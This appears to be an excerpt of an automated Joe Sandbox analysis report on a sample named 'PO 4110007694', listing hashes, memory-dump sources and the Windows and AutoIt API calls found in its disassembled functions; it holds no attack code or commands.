                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
                                                                    • Instruction ID: 30ad15047e77e2c8119cdf5dfc68cc5dd2b7deab6a8151fa3570aa999d0499be
                                                                    • Opcode Fuzzy Hash: 6378527684d87364da35d07a80f82d3aa18cff836760715a603a6d9ce457831c
                                                                    • Instruction Fuzzy Hash: D732F471D69F014ED7279634DC32339A249AFB73D8F15DB3BE829B69A5EB28C5834100
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
                                                                    • Instruction ID: d0e063603effe260ab662a8cbd86ee4851cdce71517b0896af7763837ac97024
                                                                    • Opcode Fuzzy Hash: 85070980f6c0d752495fdff8d1882f73b0aa683463af42a2e9eaa9faa0ac510f
                                                                    • Instruction Fuzzy Hash: DFB10131D2AF404DD7639639883133ABA5CAFBB2D9F91D71BFC2675D22EB2185838141
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 00C7889B
                                                                      • Part of subcall function 00C3520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00C78F6E,00000000,?,?,?,?,00C7911F,00000000,?), ref: 00C35213
                                                                      • Part of subcall function 00C3520A: __aulldiv.LIBCMT ref: 00C35233
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID:
                                                                    • API String ID: 2893107130-0
                                                                    • Opcode ID: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
                                                                    • Instruction ID: 8d9e2bfe0b86f434376931189b417db957195e87ff9c8c36d7d032c1a979cffe
                                                                    • Opcode Fuzzy Hash: c2c7c8c75ff53594189dc86e4962b51866b7f1e69fb9c1a6ea6cb0ac475c9d24
                                                                    • Instruction Fuzzy Hash: 1A21AF726356108BC729CF29D841B56B3E1EBA5321B688E6DD1F9CB2C0CA34A949CB54
                                                                    APIs
                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00C74C76
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
                                                                    • Instruction ID: 86213bd6a11700aeb5927abeeb063952c0ff89bc97c0ae3f685910e858e704d3
                                                                    • Opcode Fuzzy Hash: 7a704c6d4e4438b9bcd57642861850a4d520bf686fab08301d5e86fdc54d48d2
                                                                    • Instruction Fuzzy Hash: ECD05EA016260879EC2D07208E4FF7A1109E380781FC4C14A7259C90C0EBD15D40A037
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00C68389), ref: 00C687D1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
                                                                    • Instruction ID: 0ee946abdd76bea952c23f71c8427e7555c38549c773f4883e44232c2bb4d16a
                                                                    • Opcode Fuzzy Hash: 11c099b1a7fbe036bc7075f667a5c2fd247b9242ac981614a1cd8cc30a136287
                                                                    • Instruction Fuzzy Hash: 73D05E3226450EABEF018EA4DC05EAE3B69EB04B01F408111FE15C50A1C775D835AB60
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00C3A12A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
                                                                    • Instruction ID: f05f6767ecc3c7bb64b0a94145c461a2b99be22b8da50cb36656a227a1fbff7f
                                                                    • Opcode Fuzzy Hash: 636273fcc5d75cba38d821d6b2c9e8dbadf2f01555d4246a9db4fc54d23339ca
                                                                    • Instruction Fuzzy Hash: D2A0123000010CE78A001B51EC085487F5CE6001907004021F40C80031873254514580
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
                                                                    • Instruction ID: f1d4363f3f41f3aeed2e298e5ed1495baf382ee6008833d6fa18800ac386c413
                                                                    • Opcode Fuzzy Hash: 566fb19b8c2a68202a15c2cbc7812a22638d80fe40d765860ec9252b02855b9c
                                                                    • Instruction Fuzzy Hash: 8F222330A05626CBDF38CA25E5D477CB7A1FF01304F38806AD9668B9A2DF709ED9D641
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction ID: 0dc996623b212e0164e90183e55611423316ffced93e4bac2d795901b1b7a896
                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                    • Instruction Fuzzy Hash: 7DC174322251930ADF6E463AC47403EFAA15EA37B171E176DD8B3CB1D4EE20DB65D620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction ID: 2299369028f5d2c479d14c9a9ac98f9f86b5f783d3d18fb61d799ea941b5c32a
                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                    • Instruction Fuzzy Hash: 3CC161332151930EDF2E463AC43413EBAA15EA37B1B1E176DD8B2DB1D5EE20CA25D660
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction ID: 1f07ec0b8070b58addcdf0f1ae933ed900708375d03a185f7bb13063269968c0
                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                    • Instruction Fuzzy Hash: 83C163722251930EDF2E463A847413EFAA15EA37B171E176DD8B2CB1D4EE20CA659620
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction ID: 4f6139ad6a12a8dbe5af85b45b1ed307f852a813a26112bf8d443f46c837f330
                                                                    • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                    • Instruction Fuzzy Hash: 7E41C271D1051CEBCF48CFADC991AAEFBF2AF88201F548299D516AB345D730AB41DB40
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction ID: 194f9f2e508d932d74a2604f90dfc870434d681c1b7b820213af506dda6d590c
                                                                    • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                    • Instruction Fuzzy Hash: D8019278A00109EFCB49DF98C5949AEF7FAFB48310F208599D909A7742D730EE41DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction ID: 3c1bc509b85214a0203636fe2f51f35a645696287c6a797faf3f857e1a5f1086
                                                                    • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                    • Instruction Fuzzy Hash: 7C018078A04109EFCB45DF98C5949AEF7FAFB4C210F208699D919A7742D730AE51DB80
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656450001.00000000017DE000.00000040.00000020.00020000.00000000.sdmp, Offset: 017DE000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_17de000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                    • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                    • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 00C8785B
                                                                    • DeleteObject.GDI32(00000000), ref: 00C8786D
                                                                    • DestroyWindow.USER32 ref: 00C8787B
                                                                    • GetDesktopWindow.USER32 ref: 00C87895
                                                                    • GetWindowRect.USER32(00000000), ref: 00C8789C
                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00C879DD
                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00C879ED
                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A35
                                                                    • GetClientRect.USER32(00000000,?), ref: 00C87A41
                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00C87A7B
                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87A9D
                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AB0
                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87ABB
                                                                    • GlobalLock.KERNEL32(00000000), ref: 00C87AC4
                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AD3
                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00C87ADC
                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87AE3
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00C87AEE
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B00
                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00CA2CAC,00000000), ref: 00C87B16
                                                                    • GlobalFree.KERNEL32(00000000), ref: 00C87B26
                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00C87B4C
                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00C87B6B
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87B8D
                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00C87D7A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                    • API String ID: 2211948467-2373415609
                                                                    • Opcode ID: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
                                                                    • Instruction ID: 29eed8d8ae1f0429484585596256f9ed5eb78c43b1ae1c58dd7e943b7aa517fb
                                                                    • Opcode Fuzzy Hash: ef4288a2713a17c3277362ee596a4a864a36c5d8ef673216382bf9d9291f493d
                                                                    • Instruction Fuzzy Hash: C3026A71900115AFDB14EFA4CC89FAE7BB9EB49314F148259F915EB2A0D730EE42DB60
                                                                    APIs
                                                                    • CharUpperBuffW.USER32(?,?,00C9F910), ref: 00C93627
                                                                    • IsWindowVisible.USER32(?), ref: 00C9364B
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                    • API String ID: 4105515805-45149045
                                                                    • Opcode ID: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
                                                                    • Instruction ID: fec9d16f670e06af51590235920bcd75cdf2308544e6cc9e395731e901eb2764
                                                                    • Opcode Fuzzy Hash: 98d7110e57d477b7865c2f208a5c6a3211364810fda68424da7756e0d272c7b1
                                                                    • Instruction Fuzzy Hash: D5D18C712183419BCF14EF10C869AAE77A5EF95344F144468F8929B3E2CB31EE4AEB45
                                                                    APIs
                                                                    • SetTextColor.GDI32(?,00000000), ref: 00C9A630
                                                                    • GetSysColorBrush.USER32(0000000F), ref: 00C9A661
                                                                    • GetSysColor.USER32(0000000F), ref: 00C9A66D
                                                                    • SetBkColor.GDI32(?,000000FF), ref: 00C9A687
                                                                    • SelectObject.GDI32(?,00000000), ref: 00C9A696
                                                                    • InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A6C1
                                                                    • GetSysColor.USER32(00000010), ref: 00C9A6C9
                                                                    • CreateSolidBrush.GDI32(00000000), ref: 00C9A6D0
                                                                    • FrameRect.USER32(?,?,00000000), ref: 00C9A6DF
                                                                    • DeleteObject.GDI32(00000000), ref: 00C9A6E6
                                                                    • InflateRect.USER32(?,000000FE,000000FE), ref: 00C9A731
                                                                    • FillRect.USER32(?,?,00000000), ref: 00C9A763
                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00C9A78E
                                                                      • Part of subcall function 00C9A8CA: GetSysColor.USER32(00000012), ref: 00C9A903
                                                                      • Part of subcall function 00C9A8CA: SetTextColor.GDI32(?,?), ref: 00C9A907
                                                                      • Part of subcall function 00C9A8CA: GetSysColorBrush.USER32(0000000F), ref: 00C9A91D
                                                                      • Part of subcall function 00C9A8CA: GetSysColor.USER32(0000000F), ref: 00C9A928
                                                                      • Part of subcall function 00C9A8CA: GetSysColor.USER32(00000011), ref: 00C9A945
                                                                      • Part of subcall function 00C9A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00C9A953
                                                                      • Part of subcall function 00C9A8CA: SelectObject.GDI32(?,00000000), ref: 00C9A964
                                                                      • Part of subcall function 00C9A8CA: SetBkColor.GDI32(?,00000000), ref: 00C9A96D
                                                                      • Part of subcall function 00C9A8CA: SelectObject.GDI32(?,?), ref: 00C9A97A
                                                                      • Part of subcall function 00C9A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00C9A999
                                                                      • Part of subcall function 00C9A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00C9A9B0
                                                                      • Part of subcall function 00C9A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00C9A9C5
                                                                      • Part of subcall function 00C9A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00C9A9ED
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.1656099798.0000000000C11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C10000, based on PE: true
                                                                    • Associated: 00000000.00000002.1656075987.0000000000C10000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000C9F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656147462.0000000000CC4000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656191450.0000000000CCE000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.1656205480.0000000000CD7000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_c10000_PO 4110007694.jbxd
                                                                    Similarity
                                                                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                    • String ID:
                                                                    • API String ID: 3521893082-0
                                                                    • Opcode ID: 031bff4fcf7b16e3ca5d97379c0061936e4d70004f270227b8f0e1a1a0004e7e
                                                                    • Instruction ID: e7a6a56fbd6e9b9ab603534cce6a37f8cf6683c7f80edbaec43fc8a16a5d80b2
                                                                    • Opcode Fuzzy Hash: 031bff4fcf7b16e3ca5d97379c0061936e4d70004f270227b8f0e1a1a0004e7e
                                                                    • Instruction Fuzzy Hash: 12914B72408305EFCB109F64DC0CB6E7BA9FB88321F104A2EF9A2D61A0D771D945CB92
                                                                    APIs
                                                                    • DestroyWindow.USER32(?,?,?), ref: 00C12CA2
                                                                    • DeleteObject.GDI32(00000000), ref: 00C12CE8
                                                                    • DeleteObject.GDI32(00000000), ref: 00C12CF3
                                                                    • DestroyIcon.USER32(00000000,?,?,?), ref: 00C12CFE
                                                                    • DestroyWindow.USER32(00000000,?,?,?), ref: 00C12D09
                                                                    • SendMessageW.USER32(?,00001308,?,00000000), ref: 00C4C43B
                                                                    • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00C4C474
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00C4C89D
                                                                      • Part of subcall function 00C11B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00C12036,?,00000000,?,?,?,?,00C116CB,00000000,?), ref: 00C11B9A
                                                                    • SendMessageW.USER32(?,00001053), ref: 00C4C8DA
                                                                    • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00C4C8F1
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C907
                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00C4C912
                                                                    Strings
                                                                    Memory Dump Source
